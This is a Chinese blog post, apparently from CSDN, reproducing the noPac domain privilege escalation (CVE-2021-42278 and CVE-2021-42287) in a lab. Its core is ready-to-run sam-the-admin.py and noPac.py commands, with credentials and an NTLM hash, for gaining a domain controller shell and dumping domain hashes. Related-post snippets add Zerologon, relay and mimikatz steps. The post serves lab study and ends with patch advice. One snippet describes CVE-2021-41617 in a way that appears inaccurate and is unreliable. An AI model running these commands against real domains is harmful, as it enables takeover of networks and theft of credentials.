域内提权 (CVE-2021-42278 & CVE-2021-42287) 漏洞利用

已于 2022-08-06 16:11:27 修改
阅读量3.8k 收藏 7
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞利用 文章标签: 网络安全 漏洞利用
于 2022-07-03 22:26:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Captain_RB/article/details/125569452
本文详细介绍了Windows AD域的两个高危漏洞CVE-2021-42278和CVE-2021-42287,这两个漏洞可能导致域内用户提升至域管理员权限。内容包括漏洞介绍、受影响系统版本、实验环境、漏洞利用方法(如sam-the-admin.py和noPac.py工具)以及漏洞修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2021年11月,Microsoft 曝出了两个关于 Windows AD 域提权的漏洞:CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致域内普通用户提升至域管权限。

文章目录

一、漏洞介绍

CVE-2021-42278利用AD域计算机账户认证漏洞,使用计算机账户的sAMAccountName冒充域控制器,结合CVE-2021-42287可以获取Kerberos特权属性证书 (PAC),从而使域内普通用户权限提升至域管理员权限。

影响系统版本:
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)

二、漏洞利用

实验环境
域控制器及域信息:
OS: Microsoft Windows Server 2016 Datacenter
Hostname: DC01
IP: 192.168.43.100
Domain: main.test.com
NetBIOS Domain Name: MAIN

已知域用户: testuser,密码: p@55word

攻击机不在域内,但能访问域控
工具和指令均在攻击机上操作

很多工具都可以对 CVE-2021-42278 & CVE-2021-42287 进行利用,这里介绍两种自动化脚本:

(一) sam-the-admin.py

工具链接:https://github.com/WazeHell/sam-the-admin

注意:该脚本只能在Kali环境中运行

工具使用前先安装依赖包:pip3 install -r requirements.txt

获取Shell
python3 sam_the_admin.py "main/testuser:p@55word" -dc-ip 192.168.43.100 -shell

运行结果如下:
请添加图片描述
注意获取shell是通过impacket包中的smbexec.py,获取HASH是通过impacket包中的secretsdump.py,在sam-the-admin.py中有如下定义:

fbinary = "/usr/bin/impacket-smbexec"
if options.dump:
    fbinary = "/usr/bin/impacket-secretsdump"

其中smbexec.py的路径是/usr/bin/impacket-smbexec,secretsdump.py的路径是/usr/bin/impacket-secretsdump,如果系统环境中这两个脚本不是此路径,则需要将其调用路径进行修改。

另外,虽然sam-the-admin.py帮助文档中有提到获取HASH和HASH传递认证方式,但是测试中都没有执行成功。

(二) noPac.py

在sam-the-admin.py的基础上改进,工具链接:https://github.com/Ridter/noPac

工具使用前先安装依赖包:pip3 install -r requirements.txt

获取Shell
python3 noPac.py -use-ldap main.test.com/testuser:p@55word -dc-ip 192.168.43.100 -shell

运行结果如下:
请添加图片描述
注意log信息中提示Current ms-DS-MachineAccountQuota = 10,表示普通用户新建计算机账户上限为10 (10是默认值,如果修改为0则表示无法新建计算机账户,漏洞利用会失败),工具运行后会尝试将执行过程中新建的计算机账户删掉,但是只有域管权限才可以成功删除,因此在使用普通域用户权限时,每执行一次都会新建一个计算机账户,当数量达到上限10,漏洞利用会失败。

获取HASH
python3 noPac.py -use-ldap main.test.com/testuser:p@55word -dc-ip 192.168.43.100 -dump -just-dc-ntlm

运行结果如下:
请添加图片描述
认证方式支持HASH传递,如:

python3 noPac.py -use-ldap main.test.com/testuser -hashes :52888cf384b8d2e56e0cc2bb6b906f99 -dc-ip 192.168.43.100 -dump -just-dc-ntlm

三、漏洞修复

参考Microsoft安全更新程序指南:CVE-2021-42278CVE-2021-42287,域控上安装相应补丁即可,成员机不需要。

Exchange SSRF 域内漏洞复现(CVE-2018-8581)
谢公子的博客
07-01 4114
漏洞描述 Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意域内用户通过NTML Relay来接管域控!攻击者仅需要拥有一个普通域内用户限即可对存在漏洞的Exchange服务器发起攻击,进而接管域控。 漏洞影响版本 Exchange 2010 ~ Exchange 2016 漏洞过程 Exchange允许任何用户为推送订阅指定所需的URL,服务器将尝试向这个URL发送通知。问题出在Excha...
内网渗透(七十九)CVE-2021-42287 漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-20 1020
这个漏洞的产生核心的原因是KDC在处理UserName字段时的问题,而后结合两种攻击链针对域内和跨域进行攻击。当针对域内攻击时,结合了CVE-2021-42278漏洞来修改机器⽤户的saMAccountName属性,让KDC找不到⽤户,⾛进处理UserName的逻辑。然后再利⽤KDC在处理S4U2Self时的逻辑问题(不校验发起S4U2Self请求的⽤户是否具有限发起S4U2Self请求)以及重新⽣成PAC的这⼀特性来进⾏攻击。当针对跨域攻击时,其实意义不⼤。
Cve-2021-42278cve-202142287漏洞复现及原理讲解
keaideshuoshuo的博客
07-05 1537
Kerberos是一种计算机网络身份验证协议,用于在不安全的网络环境中供安全的通信和强身份验证。其设计目标是通过密钥系统为网络中通信的客户机(Client)/服务器(Server)应用程序供严格的身份验证服务,确保通信双方身份的真实性和安全性。
CVE-2025-33073 NTLM反射 漏洞复现
最新发布
渗透之路,攻防之间皆学问
06-18 2596
CVE-2025-33073是一个高危Windows SMB客户端漏洞,可通过NTLM/Kerberos认证反射实现域内SYSTEM。攻击者只需普通域账号,在满足目标主机未强制SMB签名且域DNS可被篡改的条件下,即可通过构造特殊DNS记录(如server11UWhRC...指向攻击机)、启动SMB中继服务(ntlmrelayx.py)和触发NTLM认证(PetitPotam)三个步骤,将认证反射回目标主机自身,最终获取SYSTEM限。该漏洞影响所有未安装2025年6月补丁且未启用SMB签名的域内
CVE-2021-42278 & CVE-2021-42287域内漏洞
渗透之路,攻防之间皆学问
02-17 3159
2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户升至域管限。是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充域控制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证域内机器账户中是否有$,导致机器账户可以被假冒。是影响Kerberos特属性证书(PAC)的安全绕过漏洞,允许通过假冒域控制器,使密钥分发中心KDC创建高限票据。
域内CVE-2021-42278漏洞复现
一只爱吃橙子的羊
11-21 1871
域内CVE-2021-42278漏洞复现,本文仅为验证漏洞,在本地环境测试验证,无其它目的。
CVE-2020-1472域内漏洞复现
whojoe的博客
07-08 973
CVE-2020-1472域内漏洞复现环境漏洞复现mimikatz查看原本hashpoc重置密码获取密码恢复密码查看恢复的密码python重置密码获取域管密码1获取域控机器密码1获取域控机器密码2恢复域控密码查看恢复的密码参考文章 环境 ad 192.168.164.129 user 192.168.164.133 kali 192.168.164.x 漏洞复现 mimikatz 查看原本hash mimikatz.exe "privilege::debug" "sekurlsa::logonpassw
内网渗透:八、CVE-2020-1472 NetLogon 域内漏洞(域控密码置空)
liu_jia_liang的博客
03-08 5429
简介: 2020年8月11号,微软修复了Netlogon 特漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote pr...
域控漏洞-CVE-2021-42287&42278复现
君行路的博客
12-16 1万+
文章目录环境介绍sam-the-admin python利用脚本noPac利用脚本利用流程1. 查询MAQ值2. 普通域用户创建机器账户并清除SPN3. 重设机器名称4. 为机器账户请求TGT5. 再次更改机器账户的sAMAccountName6. 通过S4U2self协议向DC请求TGS票据参考链接 微信公众号:信安文摘 环境介绍 域:god.org windows 7 192.168.52.143 机器名称:stu1 域内普通用户:liukaifeng01:hongrisec@2021@ wind
【安全漏洞CVE-2021-42287&CVE-2021-42278 域内
HBohan的博客
12-25 2626
网络安全技术学习,承认⾃⼰的弱点不是丑事。只有对原理了然于⼼,才能突破更多的限制。拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板。知识⾯,决定看到的攻击⾯有多⼴;知识链,决定发动的杀伤链有多深。
CVE-2021-42278域内
include_voidmain的博客
03-16 5128
0x01 漏洞背景 前些日子的靶场中涉及到了域内,当时刚好爆出CVE-2022-42278这个域内漏洞,正好下载下来了POC试了试,确实不错,于是打算看看这个只需一个域用户,就能获取域控限的漏洞怎么回事,便有了这篇文章。 0x02 环境搭建 在这里搭建了一个简单的内网环境,主机AD_USER将445端口暴露在外,并且存在ms17_010,hacker通过AD_USER的445端口进入域内,随后通过CVE-2021-42287拿下AD。 环境详情: 主机IP Hacker192.168.80.12
CVE-2021-1675 Windows Print Spooler 域内漏洞记录
small_cat's home
12-19 311
记录CVE-2021-1675的复现过程
ms17010漏洞利用_CVE20201472域内漏洞
weixin_35039018的博客
01-23 1558
0x01 漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控并且知道域控计算机名即可利用漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控...
Windows域漏洞CVE-2021-442287
qq_53579360的博客
11-25 1016
Windows域漏洞CVE-2021-442287
CVE-2022-26923域漏洞
m0_46377671的博客
05-24 4214
CVE-2022-26923域漏洞 参考链接: http://www.ctfiot.com/40081.html https://tryhackme.com/room/cve202226923 https://www.bilibili.com/video/BV1hL4y1F79y?spm_id_from=333.337.search-card.all.click 1.漏洞背景 Windows Active Directory (AD) 不仅用于身份和访问管理,还供大量服务来帮助您运行和管理您的组织,其
cve-2022-26923复现——域漏洞复现
m0_46317063的博客
04-23 1663
cve-2022-26923域漏洞复现
Windows域服务漏洞CVE-2021-42287, CVE-2021-42278
热门推荐
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows域服务漏洞CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行升。攻击者可利用漏洞造成将域内的普通用户升到域管理员限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
CVE-2022-26923 ADCS漏洞
渗透之路,攻防之间皆学问
05-22 5182
CVE-2022-26923是一个影响微软Active Directory证书服务(AD CS)的漏洞
MS14_068域漏洞复现
ninnjnjn的博客
04-02 790
MS14_068域漏洞复现 1.漏洞说明 该漏洞可能允许攻击者将未授的域用户账户的限,到域管理员的限 2.漏洞原理 3.漏洞利用 (1)域控主机没有打MS14_068的补丁 (2)攻击者拿下了一台域内主机的普通计算机,并获得普通域用户名以及密码/hash值,和用户的suid 4.实验环境 域控主机windows 2008R2 192.168.164.55 域内主机windows ...
cve-2021-41617漏洞
03-25
### CVE-2021-41617 漏洞详情 CVE-2021-41617 是一个存在于 OpenSSH 中的安全漏洞,该漏洞允许攻击者通过特定条件下的操作系统命令注入来执行恶意操作。此漏洞主要影响 OpenSSH 的某些配置环境,在这些环境中未正确处理输入数据可能导致未经授的访问或升。 具体而言,当 SSH 配置文件中启用了 `PermitListen` 或其他类似的转发选项时,如果参数未经严格校验,则可能被利用来进行命令注入攻击[^1]。这种类型的漏洞通常会对远程服务器构成严重威胁,因为它可以绕过正常的认证机制并获得目标系统的控制。 ### 影响范围 受到影响的主要版本包括但不限于低于 OpenSSH 8.8 的所有版本。这意味着运行旧版软件的服务端都可能存在潜在风险。不同 Linux 发行版对应的具体受影响包版本也有所不同: - 对于 CentOS 7 用户来说,任何早于 **openssh-7.4p1-22.el7_9** 的版本均处于危险之中; - 而对于 CentOS 8 来讲,则需确保安装的是至少为 **openssh-8.0p1-13.el8** 版本以上的程序实例才能有效规避此类安全隐患[^3]。 值得注意的是,并非所有的部署场景都会直接受到该问题的影响——只有那些显式设置了易受攻击功能(如动态端口映射)并且没有采取额外防护措施的情况下才会成为实际可利用的目标对象之一。 ### 修复方案 为了防止因上述缺陷而导致的数据泄露或其他形式的危害发生,官方已经发布了相应的补丁更新以解决这个问题。以下是几种常见的修复途径: #### 方法一:升级至最新稳定版本 最直接有效的办法就是把现有的 OpenSSH 组件替换为最新的安全发行版。例如, ```bash # 更新CentOS系统中的OpenSSH组件 yum clean all && yum makecache fast yum -y update openssh ``` 这一步骤会自动下载并应用由维护团队发布的修正后的二进制文件以及依赖库集合。 #### 方法二:手动编译安装指定版本 如果由于特殊原因无法在线获取资源或者希望完全掌控整个过程的话,也可以考虑从源码开始构建所需的定制化解决方案: ```bash wget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.8p1.tar.gz tar xfz openssh-8.8p1.tar.gz cd openssh-8.8p1/ ./configure --prefix=/usr/local/ssh-new \ --sysconfdir=/etc/ssh-new \ --with-md5-passwords \ --without-hardening make && make install ``` 完成之后记得调整服务启动脚本来指向新路径下的可执行文件位置。 无论采用哪种方式实施改进计划之前,请务必做好充分准备,比如创建完整的磁盘镜像备份以便万一出现问题能够迅速恢复原始状态;同时仔细阅读相关文档确认每项改动都不会干扰现有业务流程正常运转。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值